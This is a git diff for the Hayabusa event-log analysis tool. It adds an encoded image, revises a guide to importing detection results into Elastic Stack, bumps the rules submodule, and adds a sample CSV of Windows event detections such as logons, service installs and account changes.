zNq@ZftwA3~w(kWtFF3-9O_WSFgt4yw92nIw9;HK$&|${u+2qGNG<x+p`)&q8H+!H!
zFUgI)b|a(o)h^-ETX|)6WqJPR@0%m^=p|I7B$`c1JIKDKvDdsvF$x*En>m`(6c;vG
z+CQQ^fv)5W`Y;dkQ(z1mijyRYmb>}|bKTmMT}qvmeQJps3f8nbUuf|eg-2M#A&BhB
z4N3+FvIxm?2w&!!srVJJ{MI!LvIdBqQCkY=@!YwstzXKzvh&E%5C?d|Ik*BmCQ9YR
zcjxvfvj<D0U>)JF+$O14DWU=>K0Y<@N~ycs)sTW=cy^Bch|kGy4|rG*nI1E$vBtG%
zM@zt7uk0W=weKk4cqLwvTN{1|9}=YU8CtCs?1Azfq7$ZIhK6!i*4w44D76VghXx4&
za!bRXs*IUyC|gDND8k!&M=4Ws!s2Km*46H;kpLES<xqbXQ5o!UFr#&u`dn?)r5Ls|
z&7pzV@OX=|?RWO}yE+<GGYc}<Xp*EOP^D}1MeKN#p*DX0h@U=>!g!+LQoK_`zNRB6
z#B1*7-}Np}O%|OPo;fR7IW+(_yuv(SX_s_v*Dar^e}Xuq(@fO}nECEn_AQ2gEivPV
zRQV<)a|2n{>zVI0whOhOb%C|>5}pZI&&B|B{!5SxAaclPBlNwobB@Yo;O&>jdH1f5
z6wc$HwgZGnTo@(B*4+v^18uO`Mg%~V_w0L~#&-MfZjEMNz`Xq+x%p~TZ=otpO#Y|C
z^16`Gcl!7ugdL1cW2?7?@vRRR<!Qf4Ub4#hHM(6?mWOU>A6I_?wx)yVSX5I{A*`Vx
zxbf;Cs!sBdh5i)0+qm9}S2;ktF%o&GlXmiRrb@D@NgE0=?4xv!fbukv<oahvo-@^;
zsaW1?rlEK7H*F1RY^IB5?PD1o^+!vqq7T&Ttzr>6hfP*FK0I!ZR_hHeSuMm?@6N{l
zY}%}33xZ2t9+ht|I=kW5W}i@br&VbB6+1|5w%{Wndom4>v?2$wusKPIPt2DM$dFk`
z9~aavo7>wAQDl96acpvaX{>r(_e#p8QbIE$N0K!SjWy!tP`jS8yPo4?>(6=R5k7iZ
z{jl-!vB%{cgNKp(kJ)1nk(}SVK$J?62HAhf4z&x}o{i3&bA~cF>Vutji2u3i{@Q*2
z@<RG6i9+Tl$>SrwsSq;vS(7BPiR+wg$Me@`-G^MC8&JEVeIdhXe!D@!6%#zVs4X!i
zLk-%fs(VDIPWQ41PqITWv#d{R0?UZ2AO;xWRV-K|?_kzgS^S0~Crh&mmMOg>VRW(!
zRqT<J)^9Lal6_I_in?iau2WU>gk08daL|k!+bJG%BrF?oav#-x00i$%%xmkFI)043
zoFuz=L-Ob{f43O9^qR}7U5}-a<cX=V$BtrR42Yy8X=U75K_RhAhChsoi=Om?yDHwV
zw12fU|8lQ?ymj&EPEnn|Z)p9(_jfZ@_7_E{AEhSX=tlmL4S1>-XK<Q_Qx;(dXHEMO
z&sC0XuOI-XKXny$#lWIuj)ZV1XDS%^bv$+P<&VR59|gO7mZoe$<z=Ef_+X7h=-qN3
zYKR@Oj3%MkekxDk#UCb-@jRP2nX`JM%yX}$M;BI1BP6P|Q>}z2ifd@k8gSv31^>Lh
z{fMYKrM%IGtKogK{ie#8!XI{0=_$RVKC9yKf4_<U{Yd%UEW+H}p`pIwR|yt|tO|6Z
zv^;i>1&4^rUxvkzz<m$M(1*PmM}8b#`qmR+wU{^@7v2wQN|Xhp33eZx?$#lf+M{qf
zWeKGyQ$*cD`{cqx?~og$+u^V{>I>T76VnfUz!IFxP(Ddd_l@(R@qT?IzS4Y=fyA;Q
z-4k;v6o0A@oXD$08lxz^Q1xmk@z4JRpNOd1{#K&le;NM&{ks3*69Q`SveKv9eV%nR
zMA3d)Pra5uF*$ztSkHD~EYk<-x6CA^TecfB^&Pkol_z`06GrmaBx(^|v=Cl!(=p-j
z4_WlHt<RS0mH}K%7p#I)z9H;(K8xKhrhs4IKrDtgEG5Q^y6I8RBNlWl6SDiJt2%*8
z8lt`<dAgT5`J*pYcOurnbbl6M7BT4-N0a&Xm)1aO-TCiVcP>=L*VX!k;QmyyA*tkt
zTtm-Pw;{914zKaBC|UNV5f1HiSB@?PReD{MwlG5~-K4ocJmIYXbzHz8sB0Mh&FTG{
zd%tmv{goJeR#%Z!Uarn|jZ>X2J3OK#IphkAEZ1v7h!;s`YqsZu8@F%HY!BsX3Uz2Y
ztJ)@%kyiT`x4KGBRL#*;L-ywt{ENT+4?q3i-b(xiEI~feN43xY<=g+?-N@g*?X~~y
zfSH3N+i(9*8}e_T`A2y0_ao_#?%kag%#8ZM_J4c@|N3qJ|Ks_OOXB~Vk4H)`K>nE&
zEuYn3=wQl3=u2{4^Ken$i+!ejs8wo&5Zqf#4{AfoR#feKVYFUpy5B+mt7^^{{?kxb
zbMl8@osLCJ8hMPSl$hIAMYjMIjc7%&f8cej<aMjmQk2@2Awtl$=<Jsc@HwlgXS$6S
z2hpC#l@pIEp{)mf7Ji7+KBJZCK><+T5x@#)SLSM>bg17i)^YB6Y8GQuKz(CL&(_nL
zVjCU<AN}RIpB=Y6rfn1fle`x9Z#+;c-TL{f-MP;_&#kHRNFb#TQXg;Y(u?3xLyYhD
z&F;JD6`F;u^TNM%R_KD$eAE1x{&hkBeLuXT1U6fa(*)~({ExBxT`@F3K8z<~=~nKu
zn5tVOb-QKD)O^+ZYf_zi#N-3&5WpiYZ)AFR>>7Iftk?zSqI^0QoGeq<Rl%#<u9pR-
zwZd(*A;)7A`+JNLoirY*p-tjv6B}^U#-vMx;jcMCqsfLY;{Bzs#Vh2$F8vqJth%rf
z#oE?$P1l#!$&!xm#7|BELA=pc%Ov}Ux%eA&U)js{*b$8YzO&lyD8}hnU;<VK&W_Ov
zbqP)-X1lcO&>heIz*5s}+eD()*V^z_Xv1x?Wq3LLGSiKdNZ-xoosot_)YXM_vTtwt
z&$n`-ae**uA}WW97IuWXjO>gZZki3DG{e7tD$=@lu)ux2g*<;xPyTLy{xpIYo_9Jy
zUiP81E^o0*TFw!jLF;LJ^4zq(j?QGbDluF@v`{+duHWGS2ZSzEs)a23<G)pkm`*NC
znlHo2rnv}afs9psxN(j*$nCAwh(C_|Os={UC5wCON2!jKn(IUREc~qp)pPFXqWyh4
zx$1_E4=!ex@B)o@d_m7q)2IbcM4?AnSz*;IyZ=c!>5|d4H{X>nTvm7LCyn-JCvC%6
zyk;%h&68~x`OcfVg8e8^5-=^S9RCD!VH{iQ8~IX)tQCnp-&8BJKQNjHa+mEY^zA8A
z+&Xai@mlGNL6if;hcngZ3aRS_#XK3r7&!AAL3JJ-&nu$3-fQ4kjTM%(I+qRyBi7~E
zz%&4~R)OKjXMT^N{3DoZ)Uw9!OJP6BzYjF|QvjbbI%S*ipM8N8YrsRI%XKL@JN2Po
z6gUFd&RHb}KNIFqqTF~HISbov6Cm2J998eMj^*k6lEX@pS_@g~z4}xp9wxFA%%-}w
zIt{x)dl?tV1Pd(JPJrrKixqyc<-j&3l!c=9Dp=nNO+e%9O~zbUlp$z8t%*CRT8*9;
zUhXe1SCKd5XCK!`O$5!+CR}(@!#$*{#J9Kk%7?*+Y;b=o8`rr^{VGo#*sjyN-Rlc}
z`{|=etLs!<V^6rBd&F|YPKr^CAD!^VtiijpRD~ilc_X5o8E9W`)Lfo&XJ@r7n_Pbb
zdN9c}Kigk#68ghWg<(_TWH<GWEu^l+yXKn*PA3Llf7)0QfQmVvyxQ+C=XyaIg9?^1
zm@@UleQo(4BB(@7Amma!6Hxt+?mB=jq&dl<F(ruUYlM4ux`uOR7Wj?9?~OA+iuF+v
zxY0~Y%`LNU-u2L)$F4nS>Kq4I$3~`?XD<kkZ{9i82S>OB8xkRkMn&AGyt*b`qwvj^
z2dauo38%hX`ztam?6}V|>Qj2GW)J6UbS;eu40<5u*+BjlN_M4Z&uZwm9+lg97^Fp+
z9b~Gt7hgN<RBwMj#6@t?x_Oa>sxbamJs+jZ9Pm9P9nVgXGJv=wLt3(Rr&dCqbzU55
zV;M;Gg}tv^9j`NA9joyN1oKM=PU@^o=GuIYKgkjlQQQ;S85(NLxyoHu7<Fr+qxyAW
zx@sqRz1l%;^m$hzyqm1cz}w$-x8BnKZQzYXc%D1(-*@<5NBHxBwHkF`oBWTpn$Rb=
zd+Qcuzv2rS&3|Knr3eCSArLbI&;1P@_o<U%uR?+4qPpvc`t~)}S#J!LMO2cmK-=|*
zM%|eF-QRNiuE;F3S#y41d4`lqy}(WAY1haTFvD+ShtMi4H|v8|?w*s%EN!*spV^O~
zSTsNpm$fvBq$<_Ropwi)OUGja<f!B5DD>L%MzQ{~srb_6rGwe)&C?O5wcN%_wXhIc
zfBq^s7$JNZ8g<YSgjAC_h6*2e_?55j3x$6r)i#h!Qd^vVn5?4V<fXL-=aL{46TR8{
zrEMqrUCpCxTi{nl4uGyA1&_04mgAl*3jTIhQ!q`gW&kHijb@0;eLny3%51z~-wt1&
z49maY_C)V^0k`xlbAtQd8{nI#>@SXS_C}RZ)Df;@Um5Pys%T}7bKM<CVis_RRqhQ(
zP$w`NgAU<P?WQ$GYv>V9a!#k8Kh6KZp7NXfjjKp1YWi7HB%I|na<A*<#GE^8fo=CI
zLrkdJ#p>qi9M5I>v)u%4$$8IZqy3f;x|enC%3WOkjm|(p>2W##^*+;exIGk^7!yJ5
zq-9sJcphXw;xx;DRYf7Wl<{1*bRUGKrM|vcPa1BRX>`&=eo1%mZ_B+tw>#SOP!d$K
zXQgr*F41wAGqU<c2e^YHvHc3Ws{kqZBRsD9*Mez{Sqrw#4YsWkx>GmBbG9x}@_<kd
zps66mTGX@{t5dnm>a<fmtm}8iHJYOmL4tEXl)u+L(feeBtbssGILYBv(&|Z%=r-QJ
ze}vNIH+dFWt_;(EFcZLA+$h{E$Cbgloj96>NgndfUbaj2s!8v4yR-U5S<~e(L12ho
z1mNL98xE!m1|_?W2jwIOR$ng<);+Ui%*i3`y4c+lHok7a-66vPt8J%YKn-ybU##>h
zZQj=FEc*gaoFz-tai~UMJnBPM$jVik$GjKbOxEk&dGv92Y?pz%j4Q||%<f9+I)OM4
zMo9)~ME+>4vR(_HDT+ARiS6mV$uP<CB$oDQ0S^yMaZBKXe6lTSkd!kN71SSuJmTM5
znFP-imUZY~ds^L>ure3CZqJM|P4!yqS%do??y!GKdR~8Ky_p^Ng<sDhk#ck*3OhML
zEEdOX&P}xIDS1S<HeH0om3fvMpJhLD^iFMGIL|_s<dn17G&@vn@mBv|M&Q4{;IFwc
z3uzcM|6#cUZ#B<yIF1fLJ4%Sj<!)lBD@CZ4$v|d=1OqK(DWCnm&(?eYr*{-GXH!K^
zXRCddvTP7LelK7fsZ`cbVR3!x>O%M2Ycg8jp)04A#gN}sid98L0W-h447FJ{YPZXF
zmirzV$x&ttNbS^*p1iTsG)zCLoPdA2+4cDvxfXTy<;P@BfO#oDo5p~q`JH&(1YNKE
zk3QSY%+>8agwA?f2};#9?_3g!8&Kp6AJ+j@+IFMs6T5y+NBxOLE&SP>L(!8jwzwu+
zaBvBz9*A2L#<nq_ZuaFiKz#*mKGgW%pUq!K`0;@KZs|nn`r$u2dY58pSX+2Fkm&nt
zmmLx~_4fFcW70qnG){vx>sAc2=-r0Gk-J6Kfh@%h#6l5Gg<8=-Ebt_J%Ws2y#uvTg
z;k5tMY^fH}1uNqurH;m%p`HIFZxTJOsWs7TKMh5FE3Zn}Vou$ntoA#|Z<51(0)(vE
z!^N=S(xoqbR%5Rc4!o0vjg9M%$Hk@&DwpNDfGDbG?H4vUS1pb9rs1Ox9Z_QIEGdVD
z<|9?VnuUw;u>E3jtZQ)?4{KyfCcBYgaHkEvFZy&GWE(c=`zxjF(gt@{@?fF8+VzO^
z4jc&7_=Rfi;0lY2PBq`0ZSiKubBj9yW?HOLALJ$r3a5IXClola93?*=og<WdeB&v9
zlT{b0B?0F+pPJ(=|KHf|9=N`Hi}IziaT4W$Vh*Q~lb)IQWoOo-IbAn4V8BRpt6pb)
z!d4r@)BIrB$rpY*ruQc&I}pn5=YEE2aSY1Y4Mc!v%H^Sx=27^|Aqi41D8C8Zc|NL1
zeWlU|T<F8K?GcMQP4T{pq38CQJAg!xI;b)oSgt?Oq+GdgbWw9nR$9^FnG+^BR)@g(
zq*^*fM7=v@ZB@fJeZPedc<p8pQo6Paf?*0tbofGdykL*K<y<$0BpXkcq{{JU-M4=8
z05ZZc1zdjN2pS*cm;e>W>C&6H3Cik12P2@9#m{?yaR}{^D^odagV8*^iBD{s^iiNn
zY%pTRQqobMGi{sR_s?R~-_xbP_V7D03=HVN68{F)zc;TpOL<K-U<RB<BpV#wO#p@(
z*0n#cX*TyizjPC_C`YegB>9C)u^J`&rAc01p7uqlX|w*Sjr@>3W7qI9d+CqnO@Eko
zVh+FQHppjJ&-(IMX!gO42Vg^A3S?$3bFs;Var_m(et838+cAg;QpW;oxJY=@l5$;K
zb|_?a--NE?fxuK0v6}{8_WXU}8nx}(!|<T8o(M_eu454q{YG?Al39M*)srL`j?y93
zZYi46X_iO+MUtR>S;kG;SvBh&XD3-1H?1<d<1tGESmD%xTrQSvao@=W9kXNApt7%W
zVV?n;%b>1vT%~^%83Xt#>)-RAQLk8kH;pI$>KZCn<)T*B`$jmMvn<R&E~u*Uhw&UY
zG5QbACou>xp5?;$qB8$ENUhOW0BWhLAIc$x#|!G7E=wQvGu#kbm0<0-n2vyHdD>(O
zJa%qK_FUun7Glz~e5bsOUlbwfgG?O|0(QQC^u$9!8nLz3f?~eL3tqvw`o{)!M}W+u
zR~rubhqkl88$Zkgc&Mo*k_go=UTX<VNyz!-PpumjfiUr>RdYGc#%DVoIdT&cwH7lV
zr?Z!(Ym`kt^Om{Px{%?UX#>}m4Mtt*d^qh7zH+5<tT$zysMlFvc90YFeW4niQ0A<A
zTvS{8xZ1}U>bLX>Bw;%5wLTye=LZMUx~XnxLxea#0TATKL4kZ;3CAqp-y6wvMIbFr
ziZ)vQA6M;P%QxQV&P}&r(q`rhv8B+AU8YWvY={yL`i$JjoG~}2^;dEI6aO*mF(m|5
z8TU!At=UohuQJ2ygGs;gkDgxxD{mqU?~}Z{ab$6EwjXCAq|Q8&oww2pibK|0v(6lC
z_nlDU+Z&#{XH8x1GvG&o*aXZ4y%Ft+a(gO_XId$obYh&HEB~v#bB~5HjpKNZO3T4I
zkxeJMoDCzZa+(PZZ5G`OxvX2QatWECNla;s=wcX?tZ>$?m0Ti}VPu9;6Ipi|6J{_P
zxz4<~<TA`{-_dUWv9)LaTkl`bIq!MTd*0vseSW|1^Ld{4c_l{LC@3mP=U~`vjTC}M
z5G8LSXu6BhUYBSy*Vv@nhxUGSBseY3h6p!<HStqCoZ_+R#iGentS4rY;+WAReNHdD
zGhcDlsh@i~{G*0u47l00X>O-~gEESwkDX~4GF!QC9$|o-6<S>Tc6I2vuUoMXj&_jM
z!Z2)P+SR~EiAX}e%wB-K0KP4I_TEiZyt*lhKilyt!I~q<zrc*A&UB7-J@(FpNT<2Y
zX#0fSq_U59RAY%S){gYxxEH94A=K@VyR}!HdayB^2#h<wGgOLv)}5_j)o!WMQW}TT
z&Dx@Be#pcFHx~8Ho3NJ~lz11~GParll;CQqMBy*5Z3lTm9UozP_2A<YFEj8}0q^^`
z0Uh_wqZ=|elR^%n>4G!oszS+2>A|(c;>vzQ5G<SySkD&GCQn7c!r0;)$muRQvDauO
z#99rpK^fo~lp<o~RrtxwULigUZNDHcTNI^oAC&&>{A&weqM*0!vKjxun6k=cP(YKH
z%_!K6R&?X{r=GP3qOy$n(ceWj1Elymci?rXo=7lc=fysQKWH1E-c5?h&@Os1^AWi?
z?2=b^qYqyeTr-C#N3o$n)VT$4DG0cRf%^hbi&?;DQbb1k(ttCwzLG_D-9y4&2d4u(
zK7|*Ys4+iz{R+Rzre3d>6r{0#Ci<kz3iuT{6kMUAD&xX{l)C{84q>yM`EFVDK=yC1
zJgWn+4IK-(xv8E+c~#TH9s}MBXSqE&stF*Vv*;`+)wfSSN(!J%Qw+R^lOt2WqzL|^
z#F@_ut=;=RgHE=L$=GtzaE@_oXTQY&bZ476#)k|v>T2sy0aor)&$Oy{uRXl#{y6Q{
zJDxwEupQF_1zoYmWX%F@)?$42NvXb5#3%rh<zYo3w7m3jw0ag|=Y-Sb)cKp<M5dYV
zoVl=13EhI$^_3e$kq35lZmO(zT*g;iT>5I<&s4_!NZkik?jp<O%RS17Ca^=&n26r#
zIg=6$pM<g6M4phd0C8N^;QLrNH1m=_6UC!oIbzjedZD~h`l!uYu^=f@v+2$QGd*a(
z&nx<6^dQ;Z^;HW<^tNecMIw{~4dQrO&u!&E!NVbW)$`Wbv@Q;prp**~j18bT^d-?L
zv@0yxkct$_=3j83WII;n#O$b0J1%LXs6BrIr;oqhSfKXi0&Nijq|vKww3)iU2!sT;
zYl?<O)l)}%k5Lwtizp+_+gRO^5?<>e5q?Nf8+2-=wT;o_#~;cM&(9FN7Kc+>Va|eq
z4rn?(zazkSm7Hn2XU8SB&#cy-6-M%(E`8BwFa`2Ws|PrZoVx?264pie#PKmle8^BM
z#5xHs=^1!7Y0gv#;Tg<{l%#lq4Kda)D<ZqIL}oz3b*}k~3K@mTO}x#|#lS{h{f6D`
zCFPOK+t|VRTeyaww4%u5aZ<ZQ!ZI^}f1sR5&s7UgfG^=?1`U#|X>_XE&mo>BnmF+z
zTm5(V%#`IWqR5?b-};7aPVb0Khb=pI9RL~$tr``$-bf~9;37s00%$KVxpPPQ3hHEo
z8zch+F~@SaVWMHk?Xp5+Wgt+i;t=r`Rw}RRQh2$@5Jr@ka723b$v;al+1av`5Gr=D
zUb#Hmn}bT5aSM!Hxo9n4+_ZP96~?KfGV=V2!~8ivu*w4*N3^?Ys(v%}8?h#c_nAw%
z1lOQm6`B9*x;6^#l)5X=F4Blq;jw3no6kE_urPpMN@ThspVfPTR_0NgFjv_EoTn2k
zFJ2f<ElLdp*Ck-{5D~D4&PA?dOQC;1B{WmWUVi;;3ci*rqui)pWz%x^9er1k$d{Zl
zv;~=4ZsvaR_p9pYA40Y1TRj<TI&R{;O5DHX1|6O2*9Up9wlX|de)QE7#3%2z7M_*$
z559-B@T`UBv-SS!#+rK8)brJ%`JA=a)bl@8k9*D31l6Lv9KkdCEQWv808Q=FB?!<Q
beo3m@LfnzbLRN~`fyZ$x#7`wh&qe<U1Z)0R

literal 0
HcmV?d00001

diff --git a/doc/ElasticStackImport/ElasticStackImport-English.md b/doc/ElasticStackImport/ElasticStackImport-English.md
index 3e3ec635..44b9d4ec 100644
--- a/doc/ElasticStackImport/ElasticStackImport-English.md
+++ b/doc/ElasticStackImport/ElasticStackImport-English.md
@@ -27,18 +27,19 @@ Click the sidebar icon in top-lefthand corner and open `Integrations`.
 
 ![Integrations](03-Integrations.png)
 
-Type in `csv` in the search bar and click `Upload a file`.
+Type in `csv` in the search bar and click `Upload a file`:
 
 ![CSV Upload](04-IntegrationsImportCSV.png)
 
-After uploading the CSV file, click `Override settings` to specify the correct timestamp format.
+After uploading the CSV file, click `Override settings` to specify the correct timestamp format:
 
 ![Override Settings](05-OverrideSettings.png)
 
 Perform the following changes and then click `Apply`:
-    1. Change `Timestamp format` to `custom`.
-    2. Specify the format as `yyyy-MM-dd HH:mm:ss.SSS XXX`
-    3. Change the `Time field` to `Timestamp`.
+
+1. Change `Timestamp format` to `custom`.
+2. Specify the format as `yyyy-MM-dd HH:mm:ss.SSS XXX`
+3. Change the `Time field` to `Timestamp`.
    
 ![Override Settings Config](06-OverrideSettingsConfig.png)
 
@@ -46,11 +47,21 @@ Now click `Import` in the bottom left-hand corner.
 
 ![CSV Import](07-CSV-Import.png)
 
-Click on `Advanced` and perform the following settings:
-    1. Title the `Index name` as `evtxlogs-hayabusa`.
-    2. Under `Index settings`, add `, "number_of_replicas": 0` so that the index health status does not turn yellow.
-    3. Under `Mappings`, change the `RuleTitle` type of `text` to `keyword` so that we can do statistics on the rule titles.
-    4. Under `Ingest pipeline`, add `, "field": "Timestamp"` under the `remove` section. Timestamps will be displayed as `@timestamp` so this duplicate field is not needed.
+Click on `Advanced` and perform the following settings before clicking `Import`:
+
+1. Title the `Index name` as `evtxlogs-hayabusa`.
+2. Under `Index settings`, add `, "number_of_replicas": 0` so that the index health status does not turn yellow.
+3. Under `Mappings`, change the `RuleTitle` type of `text` to `keyword` so that we can do statistics on the rule titles and change the `EventID` type of `long` to `keyword` in order to import without errors.
+4. Under `Ingest pipeline`, add `, "field": "Timestamp"` under the `remove` section. Timestamps will be displayed as `@timestamp` so this duplicate field is not needed. Also, delete the following in order to import without errors:
+   ```
+    {
+      "convert": {
+        "field": "EventID",
+        "type": "long",
+        "ignore_missing": true
+      }
+    },
+    ```
 
 Settings should look similar to below:
 
@@ -68,12 +79,26 @@ The default Discover view should look similar to this:
 
 ![Discover View](10-Discover.png)
 
+You can get an overview of when the events happened and frequency of events by looking at the histogram at top. You can filter with KQL to search for certain events and alerts. For example:
+  * `Level: "critical"`: Just show critical alerts.
+  * `Level: "critical" or Level: "high"`: Show high and critical alerts.
+  * `NOT Level:info`: Do not show informational events, only alerts.
+  * `*LatMov*`: Show events and alerts related to lateral movement.
+  * `"Password Spray"`: Only show specific attacks such as "Password Spray".
+  * `"LID: 0x8724ead"`: Display all activity associated with Logon ID 0x8724ead.
 
+On the left side sidebar, you can select with fields you want to display in columns:
 
-Level: "critical" 
+![Adding Columns](12-AddingColumns.png)
+
+To start off, we recommend the following columns:
+
+![Recommended Columns](13-RecommendedColumns.png)
+
+Your Discover view should now look like this:
+
+![Discover With Columns](14-DicoverWithColumns.png)
 
-*LatMov*
-"Password Spray"
 
 
 https://qiita.com/kzzzzo2/items/ead8ccc77b7609143749
\ No newline at end of file
diff --git a/rules b/rules
index 4f1ad77b..878b29e4 160000
--- a/rules
+++ b/rules
@@ -1 +1 @@
-Subproject commit 4f1ad77b0292d195ae250e161998df32d28a4e9a
+Subproject commit 878b29e4b5e7fe026751590313e2ec8127687ef8
diff --git a/sample-evtx-default-rules.csv b/sample-evtx-default-rules.csv
new file mode 100644
index 00000000..a6d7a589
--- /dev/null
+++ b/sample-evtx-default-rules.csv
@@ -0,0 +1,14662 @@
+Timestamp,Computer,EventID,Level,MitreAttack,RuleTitle,Details,RulePath,FilePath
+2013-10-24 01:16:13.843 +09:00,37L4247D28-05,4624,info,,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 01:16:27.000 +09:00,37L4247D28-05,6005,info,,Event Log Service Started,,rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 01:16:29.000 +09:00,37L4247D28-05,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2013-10-24 01:17:29.468 +09:00,37L4247D28-05,7045,info,,New Service Installed,Name: Hyper-V Heartbeat Service | Path: %SystemRoot%\system32\vmicsvc.exe -feature Heartbeat | Account: NT AUTHORITY\NetworkService | Start Type: auto start,rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 01:17:32.328 +09:00,37L4247D28-05,7045,info,,New Service Installed,Name: SynthVid | Path: system32\DRIVERS\VMBusVideoM.sys | Account:  | Start Type: demand start,rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 01:17:38.218 +09:00,37L4247D28-05,7045,info,,New Service Installed,Name: Hyper-V Data Exchange Service | Path: %SystemRoot%\system32\vmicsvc.exe -feature KvpExchange | Account: NT AUTHORITY\LocalService | Start Type: auto start,rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 01:17:40.125 +09:00,37L4247D28-05,7045,info,,New Service Installed,Name: Hyper-V Guest Shutdown Service | Path: %SystemRoot%\system32\vmicsvc.exe -feature Shutdown | Account: LocalSystem | Start Type: auto start,rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 01:17:41.421 +09:00,37L4247D28-05,7045,info,,New Service Installed,Name: Hyper-V Volume Shadow Copy Requestor | Path: %SystemRoot%\system32\vmicsvc.exe -feature VSS | Account: LocalSystem | Start Type: auto start,rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 01:17:43.125 +09:00,37L4247D28-05,7045,info,,New Service Installed,Name: netvsc | Path: system32\DRIVERS\netvsc60.sys | Account:  | Start Type: demand start,rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 01:17:44.875 +09:00,37L4247D28-05,7045,info,,New Service Installed,Name: Hyper-V Time Synchronization Service | Path: %SystemRoot%\system32\vmicsvc.exe -feature TimeSync | Account: NT AUTHORITY\LocalService | Start Type: auto start,rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 01:18:09.203 +09:00,37L4247D28-05,2003,low,,Setting Change in Windows Firewall with Advanced Security,,rules/sigma/builtin/firewall_as/win_firewall_as_setting_change.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 01:18:09.203 +09:00,37L4247D28-05,2004,medium,,Added Rule in Windows Firewall with Advanced Security,,rules/sigma/builtin/firewall_as/win_firewall_as_add_rule.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 01:18:11.000 +09:00,37L4247D28-05,6006,info,,Event Log Service Stopped,,rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 01:18:50.500 +09:00,IE8Win7,4624,info,,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 01:21:28.000 +09:00,IE8Win7,6005,info,,Event Log Service Started,,rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 01:21:30.000 +09:00,IE8Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2013-10-24 01:21:33.630 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 01:22:39.911 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 01:22:39.973 +09:00,IE8Win7,4720,low,Persis,Local User Account Created,User: IEUser | SID: S-1-5-21-3463664321-2923530833-3546627382-1000,rules/hayabusa/default/alerts/Security/4720_CreateAccount-LocalAccount_UserAccountCreated.yml,../hayabusa-sample-evtx/DeepBlueCLI/new-user-security.evtx
+2013-10-24 01:22:39.973 +09:00,IE8Win7,4720,low,Persis,Local User Account Created,User: IEUser | SID: S-1-5-21-3463664321-2923530833-3546627382-1000,rules/hayabusa/default/alerts/Security/4720_CreateAccount-LocalAccount_UserAccountCreated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 01:22:40.004 +09:00,IE8Win7,4732,high,Persis,User Added To Local Administrators Group,SID: S-1-5-21-3463664321-2923530833-3546627382-1000 | Group: Administrators | LID: 0x3e7,rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalAdministratorsGroup.yml,../hayabusa-sample-evtx/DeepBlueCLI/new-user-security.evtx
+2013-10-24 01:22:40.004 +09:00,IE8Win7,4732,high,Persis,User Added To Local Administrators Group,SID: S-1-5-21-3463664321-2923530833-3546627382-1000 | Group: Administrators | LID: 0x3e7,rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalAdministratorsGroup.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 01:22:44.979 +09:00,IE8Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: WIN-QALA5Q3KJ43$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 01:22:44.979 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: WIN-QALA5Q3KJ43 | IP Addr: 127.0.0.1 | LID: 0x298c5 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 01:22:44.979 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: WIN-QALA5Q3KJ43 | IP Addr: 127.0.0.1 | LID: 0x29908 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
